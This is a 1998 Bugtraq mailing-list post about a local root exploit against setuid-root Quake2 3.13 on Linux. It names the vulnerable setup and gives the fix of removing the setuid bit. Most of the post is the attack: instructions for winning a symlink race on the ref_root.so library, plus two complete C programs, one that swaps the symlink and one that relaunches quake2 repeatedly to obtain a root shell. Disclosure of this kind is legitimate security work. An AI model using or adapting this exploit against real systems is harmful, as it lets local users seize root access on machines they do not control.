Bugtraq mailing list archives
Quake 2 Linux 3.13 - ref_root.so still works
From: kevingeo () CRUZIO COM (kevingeo () CRUZIO COM)
Date: Wed, 25 Feb 1998 08:49:10 -0500
Vulnerable: Everyone who followed the installation instructions and made Quake2 setuid root.

Solution: chmod u-s quake2.

Exploit: In version 3.13, Quake2 tries to protect itself by checking the permissions of a library before loading it. This just introduces a race condition. Simply find a file that is owned by root and has 0700 permissions, call ref_root.so ref_root.real.so, run e.c (./e /usr/games/quake2/ref_soft.so &, for example) in background, and then run f.c. You'll have a root shell after a few minutes.

e.c:

#include <unistd.h>

/* Keeps re-pointing ref_root.so between argv[1] and ref_root.real.so. */
int main(int argc, char **argv)
{
    while (1) {
        unlink("ref_root.so");
        symlink(argv[1], "ref_root.so");
        unlink("ref_root.so");
        symlink("ref_root.real.so", "ref_root.so");
    }
}

f.c:

#include <stdlib.h>

/* Starts quake2 repeatedly with vid_ref set to root. */
int main()
{
    while (1) {
        system("/usr/games/quake/quake2 +set vid_ref root");
    }
}